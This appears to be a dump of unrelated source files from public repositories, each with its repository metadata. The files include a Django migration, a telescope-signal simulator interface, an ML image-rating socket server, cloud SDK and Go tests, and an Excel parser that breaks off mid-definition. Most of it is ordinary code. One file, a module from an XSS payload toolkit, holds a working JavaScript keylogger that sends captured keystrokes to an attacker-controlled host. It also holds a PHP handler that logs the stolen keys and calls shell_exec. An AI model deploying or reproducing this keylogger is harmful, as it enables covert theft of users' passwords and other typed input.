self.preferredStepUids
42.165247
455
0.562725
6add655847bdde2f01f155a6d99298fe21993e1a
561
py
Python
inventories/migrations/0016_auto_20200531_0048.py
amado-developer/ReadHub-RestfulAPI
8d8b445c4a84810d52bbf78a2593e0b48351590c
[ "MIT" ]
null
null
null
inventories/migrations/0016_auto_20200531_0048.py
amado-developer/ReadHub-RestfulAPI
8d8b445c4a84810d52bbf78a2593e0b48351590c
[ "MIT" ]
7
2021-03-19T03:09:53.000Z
2022-01-13T02:48:44.000Z
inventories/migrations/0016_auto_20200531_0048.py
amado-developer/ReadHub-RestfulAPI
8d8b445c4a84810d52bbf78a2593e0b48351590c
[ "MIT" ]
null
null
null
# Generated by Django 3.0.6 on 2020-05-31 00:48 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('digital_books', '0007_auto_20200527_2137'), ('inventories', '0015_auto_20200530_0500'), ] operations = [ migrations.AlterField( model_name='inventory', name='digital_book', field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='digital_books.Digital_Book'), ), ]
26.714286
125
0.659537
f25ea43b5f1322a214f8addefbb58d7f324a6433
19,396
py
Python
tiempo_deshima/interface.py
Stefanie-B/DESHIMAmodel
bcb695ea64078f2a61cf9495e18909e29e1f2a98
[ "MIT" ]
2
2020-09-05T15:22:32.000Z
2020-10-01T04:52:39.000Z
tiempo_deshima/interface.py
deshima-dev/tiempo_deshima
bcb695ea64078f2a61cf9495e18909e29e1f2a98
[ "MIT" ]
6
2020-10-30T17:13:07.000Z
2021-07-28T12:13:15.000Z
tiempo_deshima/interface.py
Stefanie-B/DESHIMAmodel
bcb695ea64078f2a61cf9495e18909e29e1f2a98
[ "MIT" ]
null
null
null
""" This module allows users to execute funtioncs in signal_transmitter, while providing default values so not all values need to be set manually. """ import numpy as np #import signal_transmitter as st #import DESHIMA.MKID.filterbank as ft from pathlib import Path from . import signal_transmitter as st from .DESHIMA.MKID import filterbank as ft import os def calcMaxObsTime(dictionary): """ Calculates the maximum observing time, using the number of gridpoints in one atmosphere strip, the gridwidth, the number of atmosphere strips and the windspeed """ # maximum time # every strip has 32768 x-values max_obs_time = (dictionary['x_length_strip'] - 3 * dictionary['separation'])* \ dictionary['max_num_strips']*dictionary['grid'] \ /dictionary['windspeed'] return max_obs_time def convert_folder(folder): folder = folder.strip('/') folder = folder.strip('\\') sourcepath = Path.cwd() while folder.startswith('.'): folder = folder.strip('.') folder = folder.strip('/') folder = folder.strip('\\') sourcepath = sourcepath.parent sourcepath = sourcepath.joinpath(folder) return sourcepath def new_filterbank(dictionary): """ Parameters ---------- dictionary : dict Dictionary obtained from get_dictionary() with the same keywords as run_tiempo() executed after this function. Input_dictionary in that function must be set to 'manual' or 'path' Returns ------- None. Must be executed when the filter properties are changed. """ if dictionary['savefolder'] == None: dictionary['savefolder'] = Path.cwd().joinpath('output_TiEMPO') else: dictionary['savefolder'] = convert_folder(dictionary['savefolder']) dictionary['sourcefolder'] = convert_folder(dictionary['sourcefolder']) length_EL_vector = 25 length_pwv_vector = 25 #test one value pwv_vector = np.logspace(0., 0., length_pwv_vector) EL_vector = np.linspace(60., 60., length_EL_vector) #make interpolation curves pwv_vector = np.logspace(-1, 0.35, length_pwv_vector) EL_vector = np.linspace(20., 90., length_EL_vector) ft1 = ft.filterbank(dictionary['F_min'], dictionary['spec_res'], dictionary['num_filters'], dictionary['f_spacing'], dictionary['num_bins'], dictionary['D1']) ft1.save_TP_data(EL_vector, pwv_vector) ft1.fit_TPpwvEL_curve(pwv_vector, EL_vector) ft1.save_etaF_data(pwv_vector, 90.) def get_dictionary(input_dictionary, prefix_atm_data, sourcefolder, save_name_data, savefolder, save_P=True, save_T=True, n_jobs = 30, n_batches = 8,\ obs_time = 2., grid = .2, x_length_strip = 65536., separation = 1.1326,\ galaxy_on = True, luminosity = 13.7, redshift = 4.43, linewidth = 600, \ EL = 60, EL_vec = None, max_num_strips = 32, pwv_0 = 1., F_min = 220e9, \ num_bins = 1500, spec_res = 500, f_spacing = 500, \ num_filters = 347, beam_radius = 5., useDESIM = 1, \ inclAtmosphere = 1, windspeed = 10, D1 = 0, \ dictionary_name = ''): """ Parameters ---------- input_dictionary : string 'deshima_1', 'deshima_2', 'manual' or 'path'. Determines where the input values of keywords F_min thru come from: either standard values for DESHIMA, manual entry from the keywords or from a txt file in the order of keywords obs_time thru D1. prefix_atm_data : string The prefix of the output of ARIS that is being used by the TiEMPO sourcefolder : string Folder where ARIS data used by the model is saved, relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\' save_name_data : string Prefix of the output of TiEMPO savefolder : string Folder where the output of the model will be saved relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\' save_P : bool determines whether the power in Watts is saved as an output. Default is True save_T : bool determines whether the sky temperature in Kelvins is saved as an output. Default is True. n_jobs : int maximum number of concurrently running jobs (size of thread-pool). -1 means all CPUs are used. n_batches : int number of batches the entire observation is divided up into. Default is 8. obs_time : float, optional Length of the observation in seconds. The default is 2.. grid : float, optional The width of a grid square in the atmosphere map in meters. The default is .2. x_length_strip : int, optional The length of one atmosphere strip in the x direction in number of gridpoints (NOT METERS). The default is 65536. separation : float, optional Separation between two chop positions in m, assuming that the atmosphere is at 1km height. Default is 1.1326 (this corresponds to 116.8 arcsec). galaxy_on : bool, optional Determines whether there is a galaxy in position 2. The default is True. luminosity : float, optional Luminosity if the galaxy in log(L_fir [L_sol]). The default is 13.7. redshift : float, optional The redshift of the galaxy. The default is 4.43. linewidth : float, optional Width of the spectral lines in the galaxy spectrum in km/s. The default is 600. EL : float, optional Elevation of the telescope in degrees. The default is 60. EL_vec: vector of floats, optional If this parameter is set, it allows to specify the elevation of the telescope in degrees per timestep, for example in the case of tracking a target. Vector must have a length of 160Hz * obs_time. max_num_strips : int, optional Number of atmosphere strips that are saved in the ARIS output folder. The default is 32. pwv_0 : float, optional Baseline value of precipitable water vapor that is added to the d(pwv) from ARIS in mm. The default is 1. F_min : float, optional Lowest center frequency of all the MKIDs. The default is 220e9. num_bins : int, optional determines the amount of bins used in the simulation of the galaxy spectrum. The default is 1500. spec_res : float, optional Spectral resolution. The default is 500. f_spacing : float, optional spacing between center frequencies = F/dF (mean). The default is 500. num_filters : int, optional Number of filters in the filterbank. The default is 347. beam_radius : float, optional Radius of the Gaussian beam in meters. The default is 5. useDESIM : int, optional 1 or 0. Determines whether the simple atmospheric model is used (0) or the more sophisticated desim simulation (1). The default is 1. inclAtmosphere : int, optional 1 or 0. Determines whether the atmosphere is included in the simulation. The default is 1 (yes). windspeed: float, optional Sped of the wind in meters/second. The default is 10. D1 : int, optional 1 or 0. Determines whether DESHIMA 1.0 is simulated. The default is 0. dictionary_name : string, optional name of a txt file in which the values of optional keywords are saved. prefix_atm_data, sourcefolder, save_name_data, savefolder, n_jobs, save_P, save_T and EL_vec must still be set outside the file. Only used when input_dictionary is set to 'path'. The default is ''. Order of the entries in the txt file must be: F_min, num_bins, spec_res, f_spacing, num_filters, beam_radius, useDESIM, inclAtmosphere, D1, time, grid, x_length_strip, galaxy_on, luminosity, redshift, linewidth, EL, max_num_strips, pwv_0, windspeed, n_batches. Returns ------- dictionary : dict Dictionary with the above keywords. """ if input_dictionary == 'deshima_1': dictionary = { 'F_min': 332e9, 'num_bins': 1500, 'spec_res': 300, 'f_spacing': 380, 'num_filters': 49, 'beam_radius': 5., 'useDESIM': 1, 'inclAtmosphere': 1, 'D1': 1 } elif input_dictionary == 'deshima_2': dictionary = { 'F_min': 220e9, 'num_bins': 1500, 'spec_res': 500, 'f_spacing': 500, 'num_filters': 347, 'beam_radius': 5., 'useDESIM': 1, 'inclAtmosphere': 1, 'D1': 0 } elif input_dictionary == 'manual': dictionary = { 'F_min': F_min, 'num_bins': num_bins, 'spec_res': spec_res, 'f_spacing': f_spacing, 'num_filters': num_filters, 'beam_radius': beam_radius, 'useDESIM': useDESIM, 'inclAtmosphere': inclAtmosphere, 'D1': D1 } else: d = np.loadtxt(os.getcwd()+'\\' + dictionary_name, comments='#') dictionary = { 'F_min': d[0], 'num_bins': d[1], 'spec_res': d[2], 'f_spacing': d[3], 'num_filters': d[4], 'beam_radius': d[5], 'useDESIM': d[6], 'inclAtmosphere': d[7], 'D1': d[8], 'time': d[9], 'grid':d[10], 'x_length_strip':d[11], 'separation':d[12], 'galaxy_on':d[13], 'luminosity':d[14], 'redshift':d[15], 'linewidth':d[16], 'EL':d[17], 'max_num_strips':d[18], 'pwv_0':d[19], 'windspeed':d[20], 'n_batches':d[21], 'save_P': save_P, 'save_T': save_T, 'prefix_atm_data':prefix_atm_data, 'save_name_data':save_name_data, 'n_jobs':n_jobs, 'savefolder' : savefolder, 'sourcefolder' : sourcefolder, 'EL_vec': EL_vec } return dictionary dictionary['n_jobs'] = int(n_jobs) dictionary['time'] = obs_time dictionary['prefix_atm_data']= prefix_atm_data dictionary['grid']= grid dictionary['x_length_strip']= float(x_length_strip) dictionary['galaxy_on'] = galaxy_on dictionary['luminosity']= luminosity dictionary['redshift']= redshift dictionary['linewidth']= linewidth dictionary['EL']= EL dictionary['max_num_strips']= max_num_strips dictionary['save_name_data']= save_name_data dictionary['pwv_0'] = pwv_0 dictionary['windspeed'] = windspeed dictionary['savefolder'] = savefolder dictionary['sourcefolder'] = sourcefolder dictionary['EL_vec'] = EL_vec dictionary['save_P'] = save_P dictionary['save_T'] = save_T dictionary['n_batches'] = int(n_batches) dictionary['separation'] = separation return dictionary def run_tiempo(input_dictionary, prefix_atm_data, sourcefolder, save_name_data, savefolder = None, save_P=True, save_T=True, n_jobs = 30, n_batches = 8,\ obs_time = 3600., grid = .2, x_length_strip = 65536., separation = 1.1326,\ galaxy_on = True, luminosity = 13.7, redshift = 4.43, linewidth = 600, \ EL = 60, EL_vec=None, max_num_strips = 32, pwv_0 = 1., F_min = 220e9, \ num_bins = 1500, spec_res = 500, f_spacing = 500, \ num_filters = 347, beam_radius = 5., useDESIM = 1, \ inclAtmosphere = 1, windspeed = 10, D1 = 0, dictionary_name = ''): """ Parameters ---------- input_dictionary : string 'deshima_1', 'deshima_2', 'manual' or 'path'. Determines where the input values of keywords F_min thru come from: either standard values for DESHIMA, manual entry from the keywords or from a txt file. prefix_atm_data : string The prefix of the output of ARIS that is being used by the TiEMPO sourcefolder : string Folder where ARIS data used by the model is saved, relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\' save_name_data : string Prefix of the output of TiEMPO savefolder : string Folder where the output of the model will be saved relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\' save_P : bool determines whether the power in Watts is saved as an output. Default is True save_T : bool determines whether the sky temperature in Kelvins is saved as an output. Default is True. n_jobs : int maximum number of concurrently running jobs (size of thread-pool). -1 means all CPUs are used. n_batches : int number of batches the entire observation is divided up into. Default is 8. obs_time : float, optional Length of the observation in seconds. The default is 2.0. grid : float, optional The width of a grid square in the atmosphere map in meters. The default is .2. x_length_strip : int, optional The length of one atmosphere strip in the x direction in number of gridpoints (NOT METERS). The default is 65536. separation : float, optional Separation between two chop positions in m, assuming that the atmosphere is at 1km height. Default is 1.1326 (this corresponds to 116.8 arcsec). galaxy_on : bool, optional Determines whether there is a galaxy in position 2. T The default is True. luminosity : float, optional Luminosity if the galaxy in log(L_fir [L_sol]). The default is 13.7. redshift : float, optional The redshift of the galaxy. The default is 4.43. linewidth : float, optional Width of the spectral lines in the galaxy spectrum in km/s. The default is 600. EL : float, optional Elevation of the telescope in degrees. The default is 60. EL_vec: vector of floats, optional If this parameter is set, it allows to specify the elevation of the telescope in degrees per timestep, for example in the case of tracking a target. Vector must have a length of 160Hz * obs_time. max_num_strips : int, optional Number of atmosphere strips that are saved in the ARIS output folder. The default is 32. pwv_0 : float, optional Baseline value of precipitable water vapor that is added to the d(pwv) from ARIS in mm. The default is 1. F_min : float, optional Lowest center frequency of all the MKIDs. The default is 220e9. num_bins : int, optional determines the amount of bins used in the simulation of the galaxy spectrum. The default is 1500. spec_res : float, optional Spectral resolution. The default is 500. f_spacing : float, optional spacing between center frequencies = F/dF (mean). The default is 500. num_filters : int, optional Number of filters in the filterbank. The default is 347. beam_radius : float, optional Radius of the Gaussian beam in meters. The default is 5. useDESIM : int, optional 1 or 0. Determines whether the simple atmospheric model is used (0) or the more sophisticated desim simulation (1). The default is 1. inclAtmosphere : int, optional 1 or 0.Determines whether the simple atmospheric model is used (0) or the more sophisticated desim simulation (1). The default is 1 (yes). windspeed: float, optional Sped of the wind in meters/second. The default is 10. D1 : int, optional 1 or 0. Determines whether DESHIMA 1.0 is simulated. The default is 0. dictionary_name : string, optional name of a txt file in which the values of optional keywords are saved. prefix_atm_data, sourcefolder, save_name_data, savefolder, n_jobs, save_P, save_T and EL_vec must still be set outside the file. Only used when input_dictionary is set to 'path'. The default is ''. Order of the entries in the txt file must be: F_min, num_bins, spec_res, f_spacing, num_filters, beam_radius, useDESIM, inclAtmosphere, D1, time, grid, x_length_strip, luminosity, redshift, linewidth, EL, max_num_strips, pwv_0, windspeed, n_batches. Returns ------- time_vector: array of floats Moments in time at which the signal is calculated. center_freq: array of floats Center frequencies of the MKIDs Saves '<cwd>/output_TiEMPO/<save_name_data>+P_X.npy' OR '<savefolder>/<save_name_data>+P_X.npy': numpy array of floats array of the power values of the signal in Watts. Dimensions are: [5 x #filters x #timesamples], as 5 pwv values are taken for each timesample Saves '<cwd>/output_TiEMPO/<save_name_data>+T_X.npy' OR '<savefolder>/<save_name_data>+T_X.npy': numpy array of floats array of the power values of the signal converted to sky temperature in Kelvins. Dimensions are: [5 x #filters x #timesamples], as 5 pwv values are taken for each timesample """ dictionary = get_dictionary(input_dictionary, prefix_atm_data, sourcefolder,\ save_name_data, savefolder, save_P, save_T, n_jobs, n_batches, obs_time, grid, \ x_length_strip, separation, galaxy_on,luminosity, redshift, \ linewidth, EL, EL_vec, max_num_strips, pwv_0, F_min, \ num_bins, spec_res, f_spacing, num_filters, \ beam_radius, useDESIM, inclAtmosphere, \ windspeed, D1, dictionary_name) if dictionary['savefolder'] == None: dictionary['savefolder'] = Path.cwd().joinpath('output_TiEMPO') else: dictionary['savefolder'] = convert_folder(dictionary['savefolder']) dictionary['sourcefolder'] = convert_folder(dictionary['sourcefolder']) if round(dictionary['separation']/dictionary['grid']) != 1e-6*round(1e6*dictionary['separation']/dictionary['grid']): raise ValueError('The separation is not an integer multiple of the ARIS grid size. Consider changing the separation to {:.5f} m or {:.5f} m instead of {} m'.format(dictionary['grid']*np.floor(dictionary['separation']/dictionary['grid']), dictionary['grid']*np.ceil(dictionary['separation']/dictionary['grid']), dictionary['separation'])) num_steps = dictionary['separation'] / (dictionary['windspeed']/160) if round(num_steps) != num_steps: raise ValueError('Separation is not an integer multiple of atmosphere distance per sample. Consider changing the windspeed to {} m/s or {} m/s instead of {} m/s'.format(dictionary['separation']*160/np.ceil(num_steps), dictionary['separation']*160/np.floor(num_steps), dictionary['windspeed'])) max_obs_time = calcMaxObsTime(dictionary) if obs_time > max_obs_time: raise ValueError('obs_time must be smaller than: ', max_obs_time) if dictionary['n_jobs'] < 1: raise ValueError('Please set a number of threads greater than or equal to 1 in n_jobs.') if dictionary['n_batches'] < 1: raise ValueError('Please set a number of signal batches greater than or equal to 1 in n_batches.') st1 = st.signal_transmitter(dictionary) [time_vector, center_freq] = st1.transmit_signal_DESIM_multf_atm() return time_vector, center_freq
52.421622
537
0.657352
222d9fdee9ee65ebc280e66218d1f4f7df620dc6
11,854
py
Python
Server_and_client/ML_Server.py
tomercahal/Statispic
a15cd664fdecff82ff0ab425a9f51134525be0fa
[ "MIT" ]
1
2020-04-02T09:19:36.000Z
2020-04-02T09:19:36.000Z
Server_and_client/ML_Server.py
tomercahal/Statispic
a15cd664fdecff82ff0ab425a9f51134525be0fa
[ "MIT" ]
null
null
null
Server_and_client/ML_Server.py
tomercahal/Statispic
a15cd664fdecff82ff0ab425a9f51134525be0fa
[ "MIT" ]
null
null
null
#For the ML #from keras.models import load_model from tensorflow.keras.models import load_model import numpy as np # For the rest of the server import socket import threading import sys import zipfile import os import cv2 as cv from cryptography.fernet import Fernet # Used to create a key, encrypt and decrypt messages SEPARATOR = "<SEPARATOR>" # Used when delivering the file name and file size. def load_images_for_trained_model(before_images_path, list_of_dirs): """This function is the same function used to manipulate the images to get them ready for prediction. The function receives the path before the images names, and a list of just the basename of the images, for example (photo1.jpg).After the server has the images from the user he will use this function in order to prepare the images for prediction.""" print(list_of_dirs) images = [] # intialize the images given and prepare them for prediction for im_dir in list_of_dirs: print(im_dir) image = cv.imread(before_images_path + "/" + im_dir) # cv.imshow('sample image', image) #for showing the image # cv.waitKey(0) image = cv.resize(image, (400, 400)) images.append(image) return np.array(images) class Server (object): def __init__(self): """The constructor of the Server""" self.IP = '127.0.0.1' # The IP of the server. self.PORT = 220 # The chose port to have the connection on self.users_allowed = sys.maxsize # This is the amount of users that are allowed to be logged in at the same time self.sem = threading.Semaphore(self.users_allowed) # using semaphore in order to handle the threads self.ML_model_location = "D:/Statispic/final-statispic_model.hdf5" self.ML_model = load_model("D:/Statispic/final-statispic_model.hdf5") # Loading the ML model self.server_file_extract_dir = "D:/Statispic/Server_and_client/thread" self.encrypt_key_path = "D:/Statispic2/Server_and_client/key.key" # Where the key is located at self.encryption_key = self.read_key() # Getting the encryption key from the key file self.decryptor = Fernet(self.encryption_key) # Initializing the Fernet with the key def read_key(self): """A function that reads the the key from the self.encrypt_key_path and returns it""" with open(self.encrypt_key_path, "rb") as file: return file.read() # Returning the key def predict_on_images_and_send_result(self, client_sock, pic_dir): """This function will get the images np array, make the predictions on them. Find the best image, return it to the user and release the thread.""" dirs_list = [] # This list will contain the directories of the images for prediction for (dirpath, dirnames, filenames) in os.walk(pic_dir): dirs_list.extend(filenames) break print("The images that the predictions are going to be on are:") print(dirs_list) images_ready_for_prediction = load_images_for_trained_model(pic_dir, dirs_list) # Getting the images ready for prediction images_ready_for_prediction = images_ready_for_prediction / 255.0 # normalizing prediction = self.ML_model.predict(images_ready_for_prediction) # Predicting the ratios for the images prediction_mul_list = prediction.tolist() prediction_list = [val for sublist in prediction_mul_list for val in sublist] # Using list comprehension print(prediction_list) for i in range(len(dirs_list)): print("X(image dir)=%s, Predicted value=%s" % (dirs_list[i], prediction[i])) # Printing the predictions best_image_dir = dirs_list[prediction_list.index(max(prediction_list))] # Super sick!! print("The best image is: " + best_image_dir + " !!!!") client_sock.send(best_image_dir[7:].encode()) # Sending the best image dir to the client self.sem.release() # Releasing the client after he has gotten his result. def receiving_loop(self, client_sock): # Not used, using the encrypted version """This is one of the most important functions in the server! It receives the client socket and reads from it until it reaches the \r\n\r\n (marking the client is sending image data now. This function returns the filesize, filename and might contain the beginning of the image data!""" part = b"" final_parts = [] start_of_image = b"" while True: received = self.decryptor.decrypt(client_sock.recv(1024)) # received = client_sock.recv(1024) if b"\r\n\r\n" in received: # Checking if we have reached the image data parts = received.split(b"\r\n\r\n") # Getting the part before the image metadata(size,name) and after. print("Reached image metadata!") final_parts.append(part + parts[0]) # Parts[0] should contain a piece of a part start_of_image += parts[1] # Probably going to contain the start of the image data break else: part += received # Just adding the total message since haven't reached image data parts_again = final_parts[0].split(b"\r\n") filesize = parts_again[0].decode() # Getting string instead of bytes filename = parts_again[1].decode() # Getting string instead of bytes return filesize, filename, start_of_image def encrypted_receiving_loop(self, client_sock, size_left, metadata_start): """This is one of the most important functions in the server! It receives the client socket, the amount of bytes left to read from the buffer until the end of the message, and the metadata start if there is one. The function returns the image name and the image data.""" metadata_total = metadata_start # Starting the total with the start of the metadata how_many_bytes = 2048 # The amount of bytes that we are going to receive while size_left > 0: # Running in a loop while we did not receive the whole size. if size_left < how_many_bytes: # This will happen on the last recv needed how_many_bytes = size_left data = client_sock.recv(how_many_bytes) # Reading from the buffer size_left -= len(data) # Decreasing the bytes left to read from the buffer. metadata_total += data decrypted_metadata = self.decryptor.decrypt(metadata_total) # Decrypting the metadata. parts_of_metadata = decrypted_metadata.split(b"\r\n\r\n") # Getting the name and image_parts image_name = parts_of_metadata[0].decode() # Need the string of the image_name image_data = parts_of_metadata[1] # Need to leave the image_data as bytes return image_name, image_data def get_images_from_user(self, client_sock, thread_num): """This function gets the client socket and the thread number. This function receives all of the client's image files, this includes the filesizes the filenames and the actual images. This function then goes on and calls predict_on_images_and_send_result.""" print('You are thread number: ' + str(thread_num)) self.sem.acquire() # Decreases the users logged in at the time (new thread opened) number_of_files = int(client_sock.recv(1024).decode()) print(f"The number of files that the user is going to send is: {number_of_files}") subfolder_name = "thread" + str(thread_num) if not os.path.isdir(self.server_file_extract_dir + str(thread_num)): os.mkdir(subfolder_name) # Create the subfolder for i in range(number_of_files): # receive the file infos print("Receiving file number " + str(i+1)) initial_receiver = client_sock.recv(8192) # Fist initial print(initial_receiver) parts = initial_receiver.split(b"\r\n", 1) # Only splitting it once. Want the size of the metadata metadata_size = int(parts[0].decode()) # Getting the int size of the metadata metadata_start = parts[1] # Might have some of the metadata in the initial_receiver total_size_left_to_recv = metadata_size - len(metadata_start) # How many more bytes left for recv. filename, image_bytes = self.encrypted_receiving_loop(client_sock, total_size_left_to_recv, metadata_start) # Getting the filename and the image_bytes data filename = os.path.basename(filename) # Getting the basename of the file (for example image1.jpg) print(f"os path basename is: {filename}") file_dir_with_file = self.server_file_extract_dir + str(thread_num) + "/server_" + filename # Building the full path name print(f"Started saving picture number {i+1}, the name of it is: {filename}") with open(file_dir_with_file, "wb") as f: # Going to be writing bytes to the file. f.write(image_bytes) # Inserting the bytes into the image and creating it. print(f"Finished download for file number {i+1}, the name of it is: {filename}") self.predict_on_images_and_send_result(client_sock, self.server_file_extract_dir + str(thread_num)) def start(self): """This is the server start function that is called in the beginning. This function accepts new clients and starts the thread for them with the appropriate thread number.""" try: print(f"Server starting up on {self.IP} port {self.PORT}") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Initializing the socket. sock.bind((self.IP, self.PORT)) sock.listen(1) # Getting one client at a time. thread_number = 0 # This will be sort of an ID for the thread, used in debugging while True: # Keep accepting as many people that want to help (speed up the process) thread_number += 1 # Increasing because of new client print('\r\nWaiting for a new client') client_socket, client_address = sock.accept() print('New client entered!') client_socket.sendall('Hello and welcome to Statispic\'s server. ' 'We hope we can help you achieve your goals on becoming an' 'instagram star!\r\nCreated by: Tomer Cahal'.encode()) # Message to the user thread = threading.Thread(target=self.get_images_from_user, args=(client_socket, thread_number)) thread.start() # Starting the thread except socket.error as e: print(e) if __name__ == '__main__': s = Server() s.start() # # with zipfile.ZipFile(self.local_file_name, 'r') as zip_file: # print("Extracting files...") # print(zip_file.namelist()) # for member in zip_file.namelist(): # print(member) # filename = os.path.basename(member) # Extracting the file name itself from the name # print(filename) # if not filename: # Skip directories # continue # # copy file (taken from zipfiles' extract) # source = member # zip_file.open(member) # #target = os.path.join(self.server_file_extract_dir, filename) # target = self.server_file_extract_dir + "/" + filename # print(source, target) # with source, target: # shutil.copyfile(source, target) # print("Done extracting...")
56.990385
131
0.655812
09cbf5fdbf02b965508fb3950fafce1223ab2c4c
1,035
py
Python
payloads/keylogger.py
redcode-labs/poXSSon
7046fac15e54e05a73d7d46a00916161d9f36cca
[ "ISC" ]
18
2022-02-20T13:27:36.000Z
2022-03-23T21:35:13.000Z
payloads/keylogger.py
redcode-labs/poXSSon
7046fac15e54e05a73d7d46a00916161d9f36cca
[ "ISC" ]
1
2022-02-20T13:37:20.000Z
2022-02-21T14:38:26.000Z
payloads/keylogger.py
redcode-labs/poXSSon
7046fac15e54e05a73d7d46a00916161d9f36cca
[ "ISC" ]
2
2022-02-20T13:35:56.000Z
2022-02-21T11:59:15.000Z
#!/usr/bin/python3.7 import socket import http.server def local_ip(): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) return s.getsockname()[0] except: return "N/A" name="keylogger" description="Captures keystrokes and sends them to an external host" options = [["LHOST", "Host to send captured strokes to", local_ip()], ["INTERVAL", "Number of seconds after which captured keystrokes are sent", "1"]] handler_options = [["LOGFILE", "File to write keystrokes to", "keystrokes.txt"]] payload = """ var keys=''; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ new Image().src = 'http://LHOST:8000/handler.php?c='+keys; keys = ''; }, INTERVAL*1000); """ handler = """ <?php shell_exec("ls"); if(!empty($_GET['c'])) { $f=fopen("LOGFILE","a+"); fwrite($f,$_GET['c']); fclose($f); } ?> """
24.642857
91
0.629952
ce3db34940e8819e06eab7d5bfd8e330bee3b0bb
951
py
Python
sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py
pjquirk/azure-sdk-for-python
cbf02ec4f177b96eae1dbbba87c34c2c93880150
[ "MIT" ]
1
2021-09-07T18:36:04.000Z
2021-09-07T18:36:04.000Z
sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py
pjquirk/azure-sdk-for-python
cbf02ec4f177b96eae1dbbba87c34c2c93880150
[ "MIT" ]
2
2019-10-02T23:37:38.000Z
2020-10-02T01:17:31.000Z
sdk/eventhub/azure-eventhubs/tests/test_iothub_receive.py
xiafu-msft/azure-sdk-for-python
4d9560cfd519ee60667f3cc2f5295a58c18625db
[ "MIT" ]
null
null
null
#------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. #-------------------------------------------------------------------------- import os import pytest import time from azure import eventhub from azure.eventhub import EventData, EventHubClient, Offset @pytest.mark.liveTest def test_iothub_receive_sync(iot_connection_str, device_id): client = EventHubClient.from_iothub_connection_string(iot_connection_str, debug=True) receiver = client.add_receiver("$default", "0", operation='/messages/events') try: client.run() partitions = client.get_eventhub_info() assert partitions["partition_ids"] == ["0", "1", "2", "3"] received = receiver.receive(timeout=5) assert len(received) == 0 finally: client.stop()
36.576923
89
0.60673
1cc59c67e70b29404f44c635eaea09da7ec4e893
783
py
Python
test/test_go_isolation_rootfs.py
afxcn/unit
a336928e1027af92d0c9bb2ccb369a3f9b53abae
[ "Apache-2.0" ]
10
2018-11-14T10:58:41.000Z
2021-12-11T01:43:51.000Z
test/test_go_isolation_rootfs.py
afxcn/unit
a336928e1027af92d0c9bb2ccb369a3f9b53abae
[ "Apache-2.0" ]
1
2021-02-07T06:35:24.000Z
2021-02-07T06:35:24.000Z
test/test_go_isolation_rootfs.py
afxcn/unit
a336928e1027af92d0c9bb2ccb369a3f9b53abae
[ "Apache-2.0" ]
3
2018-10-31T12:10:05.000Z
2019-02-14T14:09:48.000Z
import os import pytest from unit.applications.lang.go import TestApplicationGo class TestGoIsolationRootfs(TestApplicationGo): prerequisites = {'modules': {'go': 'all'}} def test_go_isolation_rootfs_chroot(self, is_su, temp_dir): if not is_su: pytest.skip('requires root') if os.uname().sysname == 'Darwin': pytest.skip('chroot tests not supported on OSX') isolation = { 'rootfs': temp_dir, } self.load('ns_inspect', isolation=isolation) obj = self.getjson(url='/?file=/go/app')['body'] assert obj['FileExists'] == True, 'app relative to rootfs' obj = self.getjson(url='/?file=/bin/sh')['body'] assert obj['FileExists'] == False, 'file should not exists'
26.1
67
0.618135
123ac6e522accb44d3043d8dea5ff72b38429410
5,700
py
Python
sw_excel_parser/engines.py
telminov/sw-excel-parser
5a9aa8eb8b6c3af2083612114e42e38598ce7e7b
[ "MIT" ]
null
null
null
sw_excel_parser/engines.py
telminov/sw-excel-parser
5a9aa8eb8b6c3af2083612114e42e38598ce7e7b
[ "MIT" ]
4
2017-12-07T05:43:03.000Z
2017-12-14T02:41:03.000Z
sw_excel_parser/engines.py
telminov/sw-excel-parser
5a9aa8eb8b6c3af2083612114e42e38598ce7e7b
[ "MIT" ]
null
null
null
from collections import OrderedDict from itertools import chain from typing import List, Dict, Optional, Set import xlrd from xlrd.sheet import Sheet class BaseEngine: item = None def __init__(self, workbook: xlrd.Book = None, file_contents: bytes = None, *args, **kwargs): self.workbook = None self.set_workbook(workbook, file_contents) self.sheet_items = OrderedDict() def __iter__(self): return iter(self.sheet_items.items()) def keys(self): return self.sheet_items.keys() def items(self): return self.sheet_items.items() def values(self): return self.sheet_items.values() def set_workbook(self, workbook: xlrd.Book = None, file_contents: bytes = None): if file_contents: self.workbook = xlrd.open_workbook(file_contents=file_contents) elif workbook: self.workbook = workbook def get_sheets(self) -> List[Sheet]: if not self.workbook: raise ValueError('You must provide workbook or file_contents') return self.workbook.sheets() def find_headers(self) -> Dict[Sheet, Optional[int]]: sheets = self.get_sheets() fields = self.item._unbound_fields.values() header = {field.kwargs['header'].lower() for field in fields} result = OrderedDict() for sheet in sheets: sheet_data = (sheet.row_values(nrow) for nrow in range(sheet.nrows)) for nrow, row_values in enumerate(sheet_data): row_values = {str(field).lower().strip() for field in row_values} if row_values >= header: result[sheet] = nrow break else: self.lost_header_handler(header=header, row_values=row_values) return result def lost_header_handler(self, header, row_values) -> None: pass def get_header(self, sheet) -> Optional[List[str]]: header = None header_map = self.find_headers() if sheet in header_map: header_nrow = header_map[sheet] header = sheet.row_values(header_nrow) return header def prepare_items(self) -> None: header_map = self.find_headers() for sheet, header_nrow in header_map.items(): data_offset = header_nrow + 1 sheet_header = list(title.lower().strip() for title in self.get_header(sheet)) sheet_data = list(sheet.row_values(nrow) for nrow in range(data_offset, sheet.nrows)) if sheet_data: self.sheet_items[sheet] = [] for nrow, row_data in enumerate(sheet_data, start=data_offset): item = self.item(nrow, dict(zip(sheet_header, row_data))) self.sheet_items[sheet].append(item) def parse(self) -> None: self.sheet_items.clear() self.prepare_items() def is_recognized(self) -> bool: headers_nrows = self.find_headers().values() return any(nrow is not None for nrow in headers_nrows) def 